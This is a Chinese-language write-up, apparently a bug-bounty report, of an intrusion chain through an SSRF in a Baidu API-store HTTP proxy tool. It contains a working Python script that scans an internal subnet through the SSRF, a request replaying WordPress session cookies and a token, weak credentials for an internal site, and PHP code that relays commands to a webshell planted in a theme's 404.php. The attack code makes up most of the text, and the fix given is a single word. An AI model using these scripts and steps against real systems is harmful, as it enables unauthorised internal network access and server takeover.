所有故事从一个简单的SSRF说起。。。
1、某次发现一个SSRF
http://apistore.baidu.com/astore/toolshttpproxy
功能十分全,包括get post 什么的。
2、内网探测
首先从dns爆破中获取部分内网ip,然后写个脚本探测
探测脚本
#encoding=utf-8
import httplib
import time
import string
import sys
import random
import json
import traceback
import urllib
reload(sys)
sys.setdefaultencoding('utf8')
headers = {'cookie':'自己加上','Content-Type':'application/x-www-form-urlencoded; charset=UTF-8','X-Requested-With':'XMLHttpRequest','User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0'}
for i in range(1, 255):
try:
print i
s = "172.22.1.%s" % (i)
conn = httplib.HTTPConnection('apistore.baidu.com')
conn.request(method='POST',
url="/astore/toolshttpproxysend",
body='reqMethod=GET&reqUrl=http%3A%2F%2F' + s +'&token=token',
headers=headers)
msg = conn.getresponse().read()
msg = json.loads(msg)
if msg["retMsg"] == "success":
print s
f = open('rrrr.txt','ab+')
f.write(s + '\r\n')
f.write( urllib.unquote(msg["retData"]["responseHeader"]).replace('<br/>','\r\n') + '\r\n')
f.write( urllib.unquote(msg["retData"]["responseBody"]).replace('<br/>','\r\n') + '\r\n\r\n')
f.close()
conn.close()
except:
print traceback.format_exc()
pass
探测结果:
其中有个 wordpress 程序引起我注意
http://172.22.1.19 (cdm.baidu.com)
3、wordpress 弱口令探测
弱口令结果还是比较多
wanglu admin
拿了一个测试下
先登陆 POST,再根据获取回来的cookie,加入到请求头中。
http://apistore.baidu.com/astore/toolshttpproxysend?
reqMethod=POST&reqUrl=http://172.22.1.19/wp-admin/&token=ae6e554399dd045278f4128312f13853&&reqHeaders[0][key]=Cookie&reqHeaders[0][value]=wc_session_cookie_534fc29aac95152772c55e78ddffb136=8fpvzWnjz76BNkvv4GJMrx1gvfVihDFS%7C%7C1425449844%7C%7C1425446244%7C%7C4bcc9f20e60d5905d3aaf9eda0c5fe28;woocommerce_items_in_cart=0;woocommerce_cart_hash=0;wordpress_test_cookie=WP+Cookie+check;wordpress_534fc29aac95152772c55e78ddffb136=wanglu%7C1425449844%7Cba1f72d7cd9660584197a34afaf1caf8;wordpress_534fc29aac95152772c55e78ddffb136=wanglu%7C1425449844%7Cba1f72d7cd9660584197a34afaf1caf8;wordpress_logged_in_534fc29aac95152772c55e78ddffb136=wanglu%7C1425449844%7C04c26a78d42c83cb884f52071d5c28c8;
成功查询到后台登陆成功后的 html。
后面就是简单的wordpress 拿shell,写模板。
这个过程比较麻烦,不过折腾下就可以成功。
4、连接webshell
为了方便操作,本地写了一个php的转发代理
<?php
$webshell="http://apistore.baidu.com/astore/toolshttpproxysend";
$data['reqMethod']='POST';
$data['reqUrl']='http://172.22.1.19/wp-content/themes/salient-new/404.php';
$data['token']='ae6e554399dd045278f4128312f13853';
$i = 0;
foreach($_POST as $key => $value)
{
$data["reqBodyParams[$i][key]"]=$key;
$data["reqBodyParams[$i][value]"]= urlencode( $value );
$i++;
}
$data = http_build_query($data);
$opts = array (
'http' => array (
'method' => 'POST',
'header'=> "Content-type: application/x-www-form-urlencoded\r\nCookie: cookie\r\nX-Requested-With: XMLHttpRequest\r\nUser-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0\r\n" .
"Content-Length: " . strlen($data) . "\r\n",
'content' => $data)
);
$context = stream_context_create($opts);
$html = @file_get_contents($webshell, false, $context);
$data = json_decode($html,true);
echo urldecode($data["retData"]["responseBody"]);
?>
过程完成,获取权限。
解决方案:
过滤